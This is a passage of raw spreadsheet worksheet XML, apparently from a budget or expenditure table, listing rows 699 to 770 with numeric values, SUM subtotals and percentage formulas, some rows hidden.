        <f>SUM(C700:C707)</f>
        <v>210</v>
      </c>
      <c r="D699" s="100">
        <f>SUM(D700:D707)</f>
        <v>329</v>
      </c>
      <c r="E699" s="173">
        <f>SUM(E700:E707)</f>
        <v>329</v>
      </c>
      <c r="F699" s="174">
        <f>E699/C699*100</f>
        <v>156.66666666666666</v>
      </c>
      <c r="G699" s="172"/>
    </row>
    <row r="700" spans="1:7" ht="17.25" customHeight="1">
      <c r="A700" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B700" s="100">
        <v>0</v>
      </c>
      <c r="C700" s="100"/>
      <c r="D700" s="100">
        <v>99</v>
      </c>
      <c r="E700" s="173">
        <v>99</v>
      </c>
      <c r="F700" s="174"/>
      <c r="G700" s="172"/>
    </row>
    <row r="701" spans="1:7" ht="17.25" customHeight="1">
      <c r="A701" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B701" s="100">
        <v>0</v>
      </c>
      <c r="C701" s="100"/>
      <c r="D701" s="100">
        <v>0</v>
      </c>
      <c r="E701" s="173"/>
      <c r="F701" s="174"/>
      <c r="G701" s="172"/>
    </row>
    <row r="702" spans="1:7" ht="17.25" customHeight="1">
      <c r="A702" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B702" s="100">
        <v>0</v>
      </c>
      <c r="C702" s="100"/>
      <c r="D702" s="100">
        <v>0</v>
      </c>
      <c r="E702" s="173"/>
      <c r="F702" s="174"/>
      <c r="G702" s="172"/>
    </row>
    <row r="703" spans="1:7" ht="17.25" customHeight="1">
      <c r="A703" s="128" t="s">
        <v>415</v>
      </c>
      <c r="B703" s="100">
        <v>210</v>
      </c>
      <c r="C703" s="100">
        <v>210</v>
      </c>
      <c r="D703" s="100">
        <v>210</v>
      </c>
      <c r="E703" s="173">
        <v>210</v>
      </c>
      <c r="F703" s="174">
        <f>E703/C703*100</f>
        <v>100</v>
      </c>
      <c r="G703" s="172"/>
    </row>
    <row r="704" spans="1:7" ht="17.25" customHeight="1">
      <c r="A704" s="128" t="s">
        <v>882</v>
      </c>
      <c r="B704" s="100">
        <v>0</v>
      </c>
      <c r="C704" s="100"/>
      <c r="D704" s="100">
        <v>0</v>
      </c>
      <c r="E704" s="173"/>
      <c r="F704" s="174"/>
      <c r="G704" s="172"/>
    </row>
    <row r="705" spans="1:7" ht="17.25" customHeight="1">
      <c r="A705" s="128" t="s">
        <v>883</v>
      </c>
      <c r="B705" s="100">
        <v>0</v>
      </c>
      <c r="C705" s="100"/>
      <c r="D705" s="100">
        <v>20</v>
      </c>
      <c r="E705" s="173">
        <v>20</v>
      </c>
      <c r="F705" s="174"/>
      <c r="G705" s="172"/>
    </row>
    <row r="706" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A706" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B706" s="100">
        <v>0</v>
      </c>
      <c r="C706" s="100"/>
      <c r="D706" s="100">
        <v>0</v>
      </c>
      <c r="E706" s="173"/>
      <c r="F706" s="174"/>
      <c r="G706" s="172"/>
    </row>
    <row r="707" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A707" s="128" t="s">
        <v>884</v>
      </c>
      <c r="B707" s="100">
        <v>0</v>
      </c>
      <c r="C707" s="100"/>
      <c r="D707" s="100">
        <v>0</v>
      </c>
      <c r="E707" s="173"/>
      <c r="F707" s="174"/>
      <c r="G707" s="172"/>
    </row>
    <row r="708" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A708" s="128" t="s">
        <v>885</v>
      </c>
      <c r="B708" s="100">
        <f>B709</f>
        <v>0</v>
      </c>
      <c r="C708" s="100">
        <f>C709</f>
        <v>0</v>
      </c>
      <c r="D708" s="100">
        <f>D709</f>
        <v>0</v>
      </c>
      <c r="E708" s="173">
        <f>E709</f>
        <v>0</v>
      </c>
      <c r="F708" s="174"/>
      <c r="G708" s="172"/>
    </row>
    <row r="709" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A709" s="128" t="s">
        <v>886</v>
      </c>
      <c r="B709" s="100"/>
      <c r="C709" s="100"/>
      <c r="D709" s="100">
        <v>0</v>
      </c>
      <c r="E709" s="173"/>
      <c r="F709" s="174"/>
      <c r="G709" s="172"/>
    </row>
    <row r="710" spans="1:7" ht="17.25" customHeight="1">
      <c r="A710" s="128" t="s">
        <v>887</v>
      </c>
      <c r="B710" s="100">
        <f>B711</f>
        <v>659</v>
      </c>
      <c r="C710" s="100">
        <f>C711</f>
        <v>659</v>
      </c>
      <c r="D710" s="100">
        <f>D711</f>
        <v>649</v>
      </c>
      <c r="E710" s="173">
        <f>E711</f>
        <v>649</v>
      </c>
      <c r="F710" s="174">
        <f aca="true" t="shared" si="46" ref="F710:F714">E710/C710*100</f>
        <v>98.48254931714719</v>
      </c>
      <c r="G710" s="172"/>
    </row>
    <row r="711" spans="1:7" ht="17.25" customHeight="1">
      <c r="A711" s="128" t="s">
        <v>888</v>
      </c>
      <c r="B711" s="100">
        <v>659</v>
      </c>
      <c r="C711" s="100">
        <v>659</v>
      </c>
      <c r="D711" s="100">
        <v>649</v>
      </c>
      <c r="E711" s="173">
        <v>649</v>
      </c>
      <c r="F711" s="174">
        <f t="shared" si="46"/>
        <v>98.48254931714719</v>
      </c>
      <c r="G711" s="172"/>
    </row>
    <row r="712" spans="1:7" ht="17.25" customHeight="1">
      <c r="A712" s="128" t="s">
        <v>889</v>
      </c>
      <c r="B712" s="100">
        <f>SUM(B713,B723,B727,B735,B740,B747,B753,B756,B761,B759,B760,B767,B768,B769,B784)</f>
        <v>22295</v>
      </c>
      <c r="C712" s="100">
        <f>SUM(C713,C723,C727,C735,C740,C747,C753,C756,C761,C759,C760,C767,C768,C769,C784)</f>
        <v>10553</v>
      </c>
      <c r="D712" s="100">
        <f>SUM(D713,D723,D727,D735,D740,D747,D753,D756,D761,D759,D760,D767,D768,D769,D784)</f>
        <v>53934</v>
      </c>
      <c r="E712" s="173">
        <f>SUM(E713,E723,E727,E735,E740,E747,E753,E756,E761,E759,E760,E767,E768,E769,E784)</f>
        <v>10836</v>
      </c>
      <c r="F712" s="174">
        <f t="shared" si="46"/>
        <v>102.6817018857197</v>
      </c>
      <c r="G712" s="172"/>
    </row>
    <row r="713" spans="1:7" ht="17.25" customHeight="1">
      <c r="A713" s="128" t="s">
        <v>890</v>
      </c>
      <c r="B713" s="100">
        <f>SUM(B714:B722)</f>
        <v>1829</v>
      </c>
      <c r="C713" s="100">
        <f>SUM(C714:C722)</f>
        <v>1829</v>
      </c>
      <c r="D713" s="100">
        <f>SUM(D714:D722)</f>
        <v>1280</v>
      </c>
      <c r="E713" s="173">
        <f>SUM(E714:E722)</f>
        <v>1280</v>
      </c>
      <c r="F713" s="174">
        <f t="shared" si="46"/>
        <v>69.98359759431384</v>
      </c>
      <c r="G713" s="172"/>
    </row>
    <row r="714" spans="1:7" ht="17.25" customHeight="1">
      <c r="A714" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B714" s="100">
        <v>1547</v>
      </c>
      <c r="C714" s="100">
        <v>1547</v>
      </c>
      <c r="D714" s="100">
        <v>1060</v>
      </c>
      <c r="E714" s="173">
        <v>1060</v>
      </c>
      <c r="F714" s="174">
        <f t="shared" si="46"/>
        <v>68.5197155785391</v>
      </c>
      <c r="G714" s="172"/>
    </row>
    <row r="715" spans="1:7" ht="17.25" customHeight="1">
      <c r="A715" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B715" s="100">
        <v>0</v>
      </c>
      <c r="C715" s="100"/>
      <c r="D715" s="100">
        <v>0</v>
      </c>
      <c r="E715" s="173"/>
      <c r="F715" s="174"/>
      <c r="G715" s="172"/>
    </row>
    <row r="716" spans="1:7" ht="17.25" customHeight="1">
      <c r="A716" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B716" s="100">
        <v>282</v>
      </c>
      <c r="C716" s="100">
        <v>282</v>
      </c>
      <c r="D716" s="100">
        <v>0</v>
      </c>
      <c r="E716" s="173"/>
      <c r="F716" s="174">
        <f>E716/C716*100</f>
        <v>0</v>
      </c>
      <c r="G716" s="172"/>
    </row>
    <row r="717" spans="1:7" ht="17.25" customHeight="1">
      <c r="A717" s="128" t="s">
        <v>891</v>
      </c>
      <c r="B717" s="100">
        <v>0</v>
      </c>
      <c r="C717" s="100"/>
      <c r="D717" s="100">
        <v>50</v>
      </c>
      <c r="E717" s="173">
        <v>50</v>
      </c>
      <c r="F717" s="174"/>
      <c r="G717" s="172"/>
    </row>
    <row r="718" spans="1:7" ht="17.25" customHeight="1">
      <c r="A718" s="128" t="s">
        <v>892</v>
      </c>
      <c r="B718" s="100">
        <v>0</v>
      </c>
      <c r="C718" s="100"/>
      <c r="D718" s="100">
        <v>0</v>
      </c>
      <c r="E718" s="173"/>
      <c r="F718" s="174"/>
      <c r="G718" s="172"/>
    </row>
    <row r="719" spans="1:7" ht="17.25" customHeight="1">
      <c r="A719" s="128" t="s">
        <v>893</v>
      </c>
      <c r="B719" s="100">
        <v>0</v>
      </c>
      <c r="C719" s="100"/>
      <c r="D719" s="100">
        <v>0</v>
      </c>
      <c r="E719" s="173"/>
      <c r="F719" s="174"/>
      <c r="G719" s="172"/>
    </row>
    <row r="720" spans="1:7" ht="17.25" customHeight="1">
      <c r="A720" s="128" t="s">
        <v>894</v>
      </c>
      <c r="B720" s="100">
        <v>0</v>
      </c>
      <c r="C720" s="100"/>
      <c r="D720" s="100">
        <v>0</v>
      </c>
      <c r="E720" s="173"/>
      <c r="F720" s="174"/>
      <c r="G720" s="172"/>
    </row>
    <row r="721" spans="1:7" ht="17.25" customHeight="1">
      <c r="A721" s="128" t="s">
        <v>895</v>
      </c>
      <c r="B721" s="100"/>
      <c r="C721" s="100"/>
      <c r="D721" s="100">
        <v>0</v>
      </c>
      <c r="E721" s="173"/>
      <c r="F721" s="174"/>
      <c r="G721" s="172"/>
    </row>
    <row r="722" spans="1:7" ht="17.25" customHeight="1">
      <c r="A722" s="128" t="s">
        <v>896</v>
      </c>
      <c r="B722" s="100">
        <v>0</v>
      </c>
      <c r="C722" s="100"/>
      <c r="D722" s="100">
        <v>170</v>
      </c>
      <c r="E722" s="173">
        <v>170</v>
      </c>
      <c r="F722" s="174"/>
      <c r="G722" s="172"/>
    </row>
    <row r="723" spans="1:7" ht="17.25" customHeight="1">
      <c r="A723" s="128" t="s">
        <v>897</v>
      </c>
      <c r="B723" s="100">
        <f>SUM(B724:B726)</f>
        <v>180</v>
      </c>
      <c r="C723" s="100">
        <f>SUM(C724:C726)</f>
        <v>180</v>
      </c>
      <c r="D723" s="100">
        <f>SUM(D724:D726)</f>
        <v>50</v>
      </c>
      <c r="E723" s="173">
        <f>SUM(E724:E726)</f>
        <v>50</v>
      </c>
      <c r="F723" s="174">
        <f aca="true" t="shared" si="47" ref="F723:F727">E723/C723*100</f>
        <v>27.77777777777778</v>
      </c>
      <c r="G723" s="172"/>
    </row>
    <row r="724" spans="1:7" ht="17.25" customHeight="1">
      <c r="A724" s="128" t="s">
        <v>898</v>
      </c>
      <c r="B724" s="100">
        <v>180</v>
      </c>
      <c r="C724" s="100">
        <v>180</v>
      </c>
      <c r="D724" s="100">
        <v>50</v>
      </c>
      <c r="E724" s="173">
        <v>50</v>
      </c>
      <c r="F724" s="174">
        <f t="shared" si="47"/>
        <v>27.77777777777778</v>
      </c>
      <c r="G724" s="172"/>
    </row>
    <row r="725" spans="1:7" ht="17.25" customHeight="1">
      <c r="A725" s="128" t="s">
        <v>899</v>
      </c>
      <c r="B725" s="100">
        <v>0</v>
      </c>
      <c r="C725" s="100"/>
      <c r="D725" s="100">
        <v>0</v>
      </c>
      <c r="E725" s="173"/>
      <c r="F725" s="174"/>
      <c r="G725" s="172"/>
    </row>
    <row r="726" spans="1:7" ht="17.25" customHeight="1">
      <c r="A726" s="128" t="s">
        <v>900</v>
      </c>
      <c r="B726" s="100">
        <v>0</v>
      </c>
      <c r="C726" s="100"/>
      <c r="D726" s="100">
        <v>0</v>
      </c>
      <c r="E726" s="173"/>
      <c r="F726" s="174"/>
      <c r="G726" s="172"/>
    </row>
    <row r="727" spans="1:7" ht="17.25" customHeight="1">
      <c r="A727" s="128" t="s">
        <v>901</v>
      </c>
      <c r="B727" s="100">
        <f>SUM(B728:B734)</f>
        <v>19149</v>
      </c>
      <c r="C727" s="100">
        <f>SUM(C728:C734)</f>
        <v>7407</v>
      </c>
      <c r="D727" s="100">
        <f>SUM(D728:D734)</f>
        <v>48503</v>
      </c>
      <c r="E727" s="173">
        <f>SUM(E728:E734)</f>
        <v>8132</v>
      </c>
      <c r="F727" s="174">
        <f t="shared" si="47"/>
        <v>109.78803834210882</v>
      </c>
      <c r="G727" s="172"/>
    </row>
    <row r="728" spans="1:7" ht="17.25" customHeight="1">
      <c r="A728" s="128" t="s">
        <v>902</v>
      </c>
      <c r="B728" s="100">
        <v>11742</v>
      </c>
      <c r="C728" s="100"/>
      <c r="D728" s="100">
        <v>34150</v>
      </c>
      <c r="E728" s="173"/>
      <c r="F728" s="174"/>
      <c r="G728" s="172"/>
    </row>
    <row r="729" spans="1:7" ht="17.25" customHeight="1">
      <c r="A729" s="128" t="s">
        <v>903</v>
      </c>
      <c r="B729" s="173">
        <v>592</v>
      </c>
      <c r="C729" s="173">
        <v>592</v>
      </c>
      <c r="D729" s="173">
        <f>7792-1500</f>
        <v>6292</v>
      </c>
      <c r="E729" s="173">
        <f>2592-1500</f>
        <v>1092</v>
      </c>
      <c r="F729" s="174">
        <f>E729/C729*100</f>
        <v>184.45945945945945</v>
      </c>
      <c r="G729" s="172"/>
    </row>
    <row r="730" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A730" s="128" t="s">
        <v>904</v>
      </c>
      <c r="B730" s="100">
        <v>0</v>
      </c>
      <c r="C730" s="100"/>
      <c r="D730" s="100">
        <v>0</v>
      </c>
      <c r="E730" s="173"/>
      <c r="F730" s="174"/>
      <c r="G730" s="172"/>
    </row>
    <row r="731" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A731" s="128" t="s">
        <v>905</v>
      </c>
      <c r="B731" s="100">
        <v>0</v>
      </c>
      <c r="C731" s="100"/>
      <c r="D731" s="100">
        <v>0</v>
      </c>
      <c r="E731" s="173"/>
      <c r="F731" s="174"/>
      <c r="G731" s="172"/>
    </row>
    <row r="732" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A732" s="128" t="s">
        <v>906</v>
      </c>
      <c r="B732" s="100">
        <v>0</v>
      </c>
      <c r="C732" s="100"/>
      <c r="D732" s="100">
        <v>0</v>
      </c>
      <c r="E732" s="173"/>
      <c r="F732" s="174"/>
      <c r="G732" s="172"/>
    </row>
    <row r="733" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A733" s="128" t="s">
        <v>907</v>
      </c>
      <c r="B733" s="100">
        <v>0</v>
      </c>
      <c r="C733" s="100"/>
      <c r="D733" s="100">
        <v>0</v>
      </c>
      <c r="E733" s="173"/>
      <c r="F733" s="174"/>
      <c r="G733" s="172"/>
    </row>
    <row r="734" spans="1:7" ht="17.25" customHeight="1">
      <c r="A734" s="128" t="s">
        <v>908</v>
      </c>
      <c r="B734" s="100">
        <f>2815+4000</f>
        <v>6815</v>
      </c>
      <c r="C734" s="100">
        <f>2815+4000</f>
        <v>6815</v>
      </c>
      <c r="D734" s="100">
        <v>8061</v>
      </c>
      <c r="E734" s="173">
        <v>7040</v>
      </c>
      <c r="F734" s="174">
        <f>E734/C734*100</f>
        <v>103.30154071900219</v>
      </c>
      <c r="G734" s="172"/>
    </row>
    <row r="735" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A735" s="128" t="s">
        <v>909</v>
      </c>
      <c r="B735" s="100">
        <f>SUM(B736:B739)</f>
        <v>0</v>
      </c>
      <c r="C735" s="100">
        <f>SUM(C736:C739)</f>
        <v>0</v>
      </c>
      <c r="D735" s="100">
        <f>SUM(D736:D739)</f>
        <v>0</v>
      </c>
      <c r="E735" s="173">
        <f>SUM(E736:E739)</f>
        <v>0</v>
      </c>
      <c r="F735" s="174"/>
      <c r="G735" s="172"/>
    </row>
    <row r="736" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A736" s="128" t="s">
        <v>910</v>
      </c>
      <c r="B736" s="100"/>
      <c r="C736" s="100"/>
      <c r="D736" s="100">
        <v>0</v>
      </c>
      <c r="E736" s="173"/>
      <c r="F736" s="174"/>
      <c r="G736" s="172"/>
    </row>
    <row r="737" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A737" s="128" t="s">
        <v>911</v>
      </c>
      <c r="B737" s="100"/>
      <c r="C737" s="100"/>
      <c r="D737" s="100">
        <v>0</v>
      </c>
      <c r="E737" s="173"/>
      <c r="F737" s="174"/>
      <c r="G737" s="172"/>
    </row>
    <row r="738" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A738" s="128" t="s">
        <v>912</v>
      </c>
      <c r="B738" s="100"/>
      <c r="C738" s="100"/>
      <c r="D738" s="100">
        <v>0</v>
      </c>
      <c r="E738" s="173"/>
      <c r="F738" s="174"/>
      <c r="G738" s="172"/>
    </row>
    <row r="739" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A739" s="128" t="s">
        <v>913</v>
      </c>
      <c r="B739" s="100"/>
      <c r="C739" s="100"/>
      <c r="D739" s="100">
        <v>0</v>
      </c>
      <c r="E739" s="173"/>
      <c r="F739" s="174"/>
      <c r="G739" s="172"/>
    </row>
    <row r="740" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A740" s="128" t="s">
        <v>914</v>
      </c>
      <c r="B740" s="100">
        <f>SUM(B741:B746)</f>
        <v>0</v>
      </c>
      <c r="C740" s="100">
        <f>SUM(C741:C746)</f>
        <v>0</v>
      </c>
      <c r="D740" s="100">
        <f>SUM(D741:D746)</f>
        <v>0</v>
      </c>
      <c r="E740" s="173">
        <f>SUM(E741:E746)</f>
        <v>0</v>
      </c>
      <c r="F740" s="174"/>
      <c r="G740" s="172"/>
    </row>
    <row r="741" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A741" s="128" t="s">
        <v>915</v>
      </c>
      <c r="B741" s="100">
        <v>0</v>
      </c>
      <c r="C741" s="100"/>
      <c r="D741" s="100">
        <v>0</v>
      </c>
      <c r="E741" s="173"/>
      <c r="F741" s="174"/>
      <c r="G741" s="172"/>
    </row>
    <row r="742" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A742" s="128" t="s">
        <v>916</v>
      </c>
      <c r="B742" s="100">
        <v>0</v>
      </c>
      <c r="C742" s="100"/>
      <c r="D742" s="100">
        <v>0</v>
      </c>
      <c r="E742" s="173"/>
      <c r="F742" s="174"/>
      <c r="G742" s="172"/>
    </row>
    <row r="743" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A743" s="128" t="s">
        <v>917</v>
      </c>
      <c r="B743" s="100">
        <v>0</v>
      </c>
      <c r="C743" s="100"/>
      <c r="D743" s="100">
        <v>0</v>
      </c>
      <c r="E743" s="173"/>
      <c r="F743" s="174"/>
      <c r="G743" s="172"/>
    </row>
    <row r="744" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A744" s="128" t="s">
        <v>918</v>
      </c>
      <c r="B744" s="100">
        <v>0</v>
      </c>
      <c r="C744" s="100"/>
      <c r="D744" s="100">
        <v>0</v>
      </c>
      <c r="E744" s="173"/>
      <c r="F744" s="174"/>
      <c r="G744" s="172"/>
    </row>
    <row r="745" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A745" s="128" t="s">
        <v>919</v>
      </c>
      <c r="B745" s="100">
        <v>0</v>
      </c>
      <c r="C745" s="100"/>
      <c r="D745" s="100">
        <v>0</v>
      </c>
      <c r="E745" s="173"/>
      <c r="F745" s="174"/>
      <c r="G745" s="172"/>
    </row>
    <row r="746" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A746" s="128" t="s">
        <v>920</v>
      </c>
      <c r="B746" s="100"/>
      <c r="C746" s="100"/>
      <c r="D746" s="100">
        <v>0</v>
      </c>
      <c r="E746" s="173"/>
      <c r="F746" s="174"/>
      <c r="G746" s="172"/>
    </row>
    <row r="747" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A747" s="128" t="s">
        <v>921</v>
      </c>
      <c r="B747" s="100">
        <f>SUM(B748:B752)</f>
        <v>0</v>
      </c>
      <c r="C747" s="100">
        <f>SUM(C748:C752)</f>
        <v>0</v>
      </c>
      <c r="D747" s="100">
        <f>SUM(D748:D752)</f>
        <v>0</v>
      </c>
      <c r="E747" s="173">
        <f>SUM(E748:E752)</f>
        <v>0</v>
      </c>
      <c r="F747" s="174"/>
      <c r="G747" s="172"/>
    </row>
    <row r="748" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A748" s="128" t="s">
        <v>922</v>
      </c>
      <c r="B748" s="100">
        <v>0</v>
      </c>
      <c r="C748" s="100"/>
      <c r="D748" s="100">
        <v>0</v>
      </c>
      <c r="E748" s="173"/>
      <c r="F748" s="174"/>
      <c r="G748" s="172"/>
    </row>
    <row r="749" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A749" s="128" t="s">
        <v>923</v>
      </c>
      <c r="B749" s="100">
        <v>0</v>
      </c>
      <c r="C749" s="100"/>
      <c r="D749" s="100">
        <v>0</v>
      </c>
      <c r="E749" s="173"/>
      <c r="F749" s="174"/>
      <c r="G749" s="172"/>
    </row>
    <row r="750" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A750" s="128" t="s">
        <v>924</v>
      </c>
      <c r="B750" s="100">
        <v>0</v>
      </c>
      <c r="C750" s="100"/>
      <c r="D750" s="100">
        <v>0</v>
      </c>
      <c r="E750" s="173"/>
      <c r="F750" s="174"/>
      <c r="G750" s="172"/>
    </row>
    <row r="751" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A751" s="128" t="s">
        <v>925</v>
      </c>
      <c r="B751" s="100">
        <v>0</v>
      </c>
      <c r="C751" s="100"/>
      <c r="D751" s="100">
        <v>0</v>
      </c>
      <c r="E751" s="173"/>
      <c r="F751" s="174"/>
      <c r="G751" s="172"/>
    </row>
    <row r="752" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A752" s="128" t="s">
        <v>926</v>
      </c>
      <c r="B752" s="100"/>
      <c r="C752" s="100"/>
      <c r="D752" s="100">
        <v>0</v>
      </c>
      <c r="E752" s="173"/>
      <c r="F752" s="174"/>
      <c r="G752" s="172"/>
    </row>
    <row r="753" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A753" s="128" t="s">
        <v>927</v>
      </c>
      <c r="B753" s="100">
        <f>SUM(B754:B755)</f>
        <v>0</v>
      </c>
      <c r="C753" s="100">
        <f>SUM(C754:C755)</f>
        <v>0</v>
      </c>
      <c r="D753" s="100">
        <f>SUM(D754:D755)</f>
        <v>0</v>
      </c>
      <c r="E753" s="173">
        <f>SUM(E754:E755)</f>
        <v>0</v>
      </c>
      <c r="F753" s="174"/>
      <c r="G753" s="172"/>
    </row>
    <row r="754" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A754" s="128" t="s">
        <v>928</v>
      </c>
      <c r="B754" s="100"/>
      <c r="C754" s="100"/>
      <c r="D754" s="100">
        <v>0</v>
      </c>
      <c r="E754" s="173"/>
      <c r="F754" s="174"/>
      <c r="G754" s="172"/>
    </row>
    <row r="755" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A755" s="128" t="s">
        <v>929</v>
      </c>
      <c r="B755" s="100"/>
      <c r="C755" s="100"/>
      <c r="D755" s="100">
        <v>0</v>
      </c>
      <c r="E755" s="173"/>
      <c r="F755" s="174"/>
      <c r="G755" s="172"/>
    </row>
    <row r="756" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A756" s="128" t="s">
        <v>930</v>
      </c>
      <c r="B756" s="100">
        <f>SUM(B757:B758)</f>
        <v>0</v>
      </c>
      <c r="C756" s="100">
        <f>SUM(C757:C758)</f>
        <v>0</v>
      </c>
      <c r="D756" s="100">
        <f>SUM(D757:D758)</f>
        <v>0</v>
      </c>
      <c r="E756" s="173">
        <f>SUM(E757:E758)</f>
        <v>0</v>
      </c>
      <c r="F756" s="174"/>
      <c r="G756" s="172"/>
    </row>
    <row r="757" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A757" s="128" t="s">
        <v>931</v>
      </c>
      <c r="B757" s="100"/>
      <c r="C757" s="100"/>
      <c r="D757" s="100">
        <v>0</v>
      </c>
      <c r="E757" s="173"/>
      <c r="F757" s="174"/>
      <c r="G757" s="172"/>
    </row>
    <row r="758" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A758" s="128" t="s">
        <v>932</v>
      </c>
      <c r="B758" s="100"/>
      <c r="C758" s="100"/>
      <c r="D758" s="100">
        <v>0</v>
      </c>
      <c r="E758" s="173"/>
      <c r="F758" s="174"/>
      <c r="G758" s="172"/>
    </row>
    <row r="759" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A759" s="128" t="s">
        <v>933</v>
      </c>
      <c r="B759" s="100"/>
      <c r="C759" s="100"/>
      <c r="D759" s="100">
        <v>0</v>
      </c>
      <c r="E759" s="173"/>
      <c r="F759" s="174"/>
      <c r="G759" s="172"/>
    </row>
    <row r="760" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A760" s="128" t="s">
        <v>934</v>
      </c>
      <c r="B760" s="100"/>
      <c r="C760" s="100"/>
      <c r="D760" s="100">
        <v>0</v>
      </c>
      <c r="E760" s="173"/>
      <c r="F760" s="174"/>
      <c r="G760" s="172"/>
    </row>
    <row r="761" spans="1:7" ht="17.25" customHeight="1">
      <c r="A761" s="128" t="s">
        <v>935</v>
      </c>
      <c r="B761" s="100">
        <f>SUM(B762:B766)</f>
        <v>1137</v>
      </c>
      <c r="C761" s="100">
        <f>SUM(C762:C766)</f>
        <v>1137</v>
      </c>
      <c r="D761" s="100">
        <f>SUM(D762:D766)</f>
        <v>3284</v>
      </c>
      <c r="E761" s="173">
        <f>SUM(E762:E766)</f>
        <v>1100</v>
      </c>
      <c r="F761" s="174">
        <f>E761/C761*100</f>
        <v>96.74582233948989</v>
      </c>
      <c r="G761" s="172"/>
    </row>
    <row r="762" spans="1:7" ht="17.25" customHeight="1">
      <c r="A762" s="128" t="s">
        <v>936</v>
      </c>
      <c r="B762" s="100">
        <v>1137</v>
      </c>
      <c r="C762" s="100">
        <v>1137</v>
      </c>
      <c r="D762" s="100">
        <f>100+1000</f>
        <v>1100</v>
      </c>
      <c r="E762" s="173">
        <f>100+1000</f>
        <v>1100</v>
      </c>
      <c r="F762" s="174">
        <f>E762/C762*100</f>
        <v>96.74582233948989</v>
      </c>
      <c r="G762" s="172"/>
    </row>
    <row r="763" spans="1:7" ht="17.25" customHeight="1">
      <c r="A763" s="128" t="s">
        <v>937</v>
      </c>
      <c r="B763" s="100">
        <v>0</v>
      </c>
      <c r="C763" s="100"/>
      <c r="D763" s="100">
        <v>0</v>
      </c>
      <c r="E763" s="173"/>
      <c r="F763" s="174"/>
      <c r="G763" s="172"/>
    </row>
    <row r="764" spans="1:7" ht="17.25" customHeight="1">
      <c r="A764" s="128" t="s">
        <v>938</v>
      </c>
      <c r="B764" s="100">
        <v>0</v>
      </c>
      <c r="C764" s="100"/>
      <c r="D764" s="100">
        <v>0</v>
      </c>
      <c r="E764" s="173"/>
      <c r="F764" s="174"/>
      <c r="G764" s="172"/>
    </row>
    <row r="765" spans="1:7" ht="17.25" customHeight="1">
      <c r="A765" s="128" t="s">
        <v>939</v>
      </c>
      <c r="B765" s="100">
        <v>0</v>
      </c>
      <c r="C765" s="100"/>
      <c r="D765" s="100">
        <v>0</v>
      </c>
      <c r="E765" s="173"/>
      <c r="F765" s="174"/>
      <c r="G765" s="172"/>
    </row>
    <row r="766" spans="1:7" ht="17.25" customHeight="1">
      <c r="A766" s="128" t="s">
        <v>940</v>
      </c>
      <c r="B766" s="100">
        <v>0</v>
      </c>
      <c r="C766" s="100"/>
      <c r="D766" s="100">
        <v>2184</v>
      </c>
      <c r="E766" s="173"/>
      <c r="F766" s="174"/>
      <c r="G766" s="172"/>
    </row>
    <row r="767" spans="1:7" ht="17.25" customHeight="1">
      <c r="A767" s="128" t="s">
        <v>941</v>
      </c>
      <c r="B767" s="100"/>
      <c r="C767" s="100"/>
      <c r="D767" s="100">
        <v>0</v>
      </c>
      <c r="E767" s="173"/>
      <c r="F767" s="174"/>
      <c r="G767" s="172"/>
    </row>
    <row r="768" spans="1:7" ht="17.25" customHeight="1">
      <c r="A768" s="128" t="s">
        <v>942</v>
      </c>
      <c r="B768" s="100"/>
      <c r="C768" s="100"/>
      <c r="D768" s="100">
        <v>0</v>
      </c>
      <c r="E768" s="173"/>
      <c r="F768" s="174"/>
      <c r="G768" s="172"/>
    </row>
    <row r="769" spans="1:7" ht="17.25" customHeight="1">
      <c r="A769" s="128" t="s">
        <v>943</v>
      </c>
      <c r="B769" s="100">
        <f>SUM(B770:B783)</f>
        <v>0</v>
      </c>
      <c r="C769" s="100">
        <f>SUM(C770:C783)</f>
        <v>0</v>
      </c>
      <c r="D769" s="100">
        <f>SUM(D770:D783)</f>
        <v>274</v>
      </c>
      <c r="E769" s="173">
        <f>SUM(E770:E783)</f>
        <v>274</v>
      </c>
      <c r="F769" s="174"/>
      <c r="G769" s="172"/>
    </row>
    <row r="770" spans="1:7" ht="17.25" customHeight="1">
      <c r="A770" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B770" s="100"/>
      <c r="C770" s="100"/>
